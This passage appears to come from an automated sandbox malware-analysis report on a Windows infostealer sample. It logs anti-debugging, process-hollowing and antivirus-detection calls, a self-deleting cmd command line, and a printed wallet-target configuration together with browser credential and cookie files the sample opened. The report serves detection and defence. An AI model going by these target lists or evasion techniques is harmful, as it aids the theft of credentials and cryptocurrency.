00418995
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_00192F7C mov edi, dword ptr fs:[00000030h]0_2_00192F7C
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001C34EA mov eax, dword ptr fs:[00000030h]0_2_001C34EA
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001C350D mov eax, dword ptr fs:[00000030h]0_2_001C350D
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001C3502 mov eax, dword ptr fs:[00000030h]0_2_001C3502
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001DA63C mov eax, dword ptr fs:[00000030h]0_2_001DA63C
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001A3BBE mov ecx, dword ptr fs:[00000030h]0_2_001A3BBE
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001ACC6F mov eax, dword ptr fs:[00000030h]0_2_001ACC6F
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 1_2_001A3BBE mov ecx, dword ptr fs:[00000030h]1_2_001A3BBE
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 1_2_001ACC6F mov eax, dword ptr fs:[00000030h]1_2_001ACC6F
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 1_2_00192F7C mov edi, dword ptr fs:[00000030h]1_2_00192F7C
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_004014AD mov eax, dword ptr fs:[00000030h]2_2_004014AD
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0040148A mov eax, dword ptr fs:[00000030h]2_2_0040148A
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_004014A2 mov eax, dword ptr fs:[00000030h]2_2_004014A2
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_004185DB mov eax, dword ptr fs:[00000030h]2_2_004185DB
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_004185DC mov eax, dword ptr fs:[00000030h]2_2_004185DC
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001AE177 GetProcessHeap,0_2_001AE177
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_0019A085 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0019A085
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_0019A212 SetUnhandledExceptionFilter,0_2_0019A212
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001A0B69 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_001A0B69
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_00199E74 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00199E74
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 1_2_0019A085 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0019A085
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 1_2_0019A212 SetUnhandledExceptionFilter,1_2_0019A212
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 1_2_001A0B69 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_001A0B69
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 1_2_00199E74 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00199E74
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0041D05A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0041D05A
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0041D9DC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0041D9DC
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0042767E SetUnhandledExceptionFilter,2_2_0042767E
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CC2AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6CC2AC62

                          HIPS / PFW / Operating System Protection Evasion

                          Source: Yara matchFile source: Process Memory Space: UMrFwHyjUi.exe PID: 1004, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: UMrFwHyjUi.exe PID: 5768, type: MEMORYSTR
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0040F51F _memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,2_2_0040F51F
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeMemory written: C:\Users\user\Desktop\UMrFwHyjUi.exe base: 400000 value starts with: 4D5A
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0041247D __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_0041247D
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_00412554 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_00412554
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeProcess created: C:\Users\user\Desktop\UMrFwHyjUi.exe "C:\Users\user\Desktop\UMrFwHyjUi.exe"
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DBFCBGCGIJKJ" & exit
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CC74760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,2_2_6CC74760
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB51C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,2_2_6CB51C30
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001C317D cpuid 0_2_001C317D
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: EnumSystemLocalesW,0_2_001B0031
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: EnumSystemLocalesW,0_2_001A7026
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: EnumSystemLocalesW,0_2_001B007C
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: EnumSystemLocalesW,0_2_001B0117
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_001B01A2
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: GetLocaleInfoW,0_2_001B03F5
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,__calloc_crt,_free,0_2_001E7493
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: GetLocaleInfoW,0_2_001A74EF
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_001B051E
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_001E9626
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: GetLocaleInfoW,0_2_001B0624
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_001B06F3
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,0_2_001EBB00
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_free,_free,_free,_free,_free,_free,_free,_free,_free,0_2_001ECBF0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_001AFD8F
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,0_2_001EBE1E
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_001EAE74
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: EnumSystemLocalesW,1_2_001B0031
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: EnumSystemLocalesW,1_2_001A7026
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: EnumSystemLocalesW,1_2_001B007C
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: EnumSystemLocalesW,1_2_001B0117
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,1_2_001B01A2
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: GetLocaleInfoW,1_2_001B03F5
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: GetLocaleInfoW,1_2_001A74EF
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_001B051E
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,1_2_001AFD8F
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: GetLocaleInfoW,1_2_001B0624
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,1_2_001B06F3
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,2_2_00410DB0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_0042B11C
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,2_2_0042B211
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,2_2_00429AA0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,2_2_0042B2B8
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,2_2_0042B313
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,2_2_0042AB90
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,2_2_00425433
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,2_2_0042B4E4
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,2_2_004274EC
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_004275C6
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,2_2_0042B5D0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: EnumSystemLocalesA,2_2_0042B5A6
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,2_2_00429DBE
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,2_2_0042E5BF
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,2_2_0042B673
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_00428E14
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,2_2_0042B637
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: GetLocaleInfoA,2_2_0042E6F4
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_0019A2C5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0019A2C5
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_00410C28 GetProcessHeap,HeapAlloc,GetUserNameA,2_2_00410C28
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_00410D03 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,2_2_00410D03
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB78390 NSS_GetVersion,2_2_6CB78390
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                          Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                          Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
                          Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000D20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                          Stealing of Sensitive Information

                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: 0.2.UMrFwHyjUi.exe.1c2c60.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.UMrFwHyjUi.exe.400000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.UMrFwHyjUi.exe.1c2c60.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.UMrFwHyjUi.exe.400000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.UMrFwHyjUi.exe.190000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: UMrFwHyjUi.exe PID: 1004, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: UMrFwHyjUi.exe PID: 5768, type: MEMORYSTR
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685626702.0000000000CF1000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: *electrum*.*
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685626702.0000000000CF1000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: *exodus*.*
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685626702.0000000000CF1000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: *ethereum*.*
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe File opened: C:\Users\user\AppData\Roaming\Binance\
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                          Source: Yara match File source: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
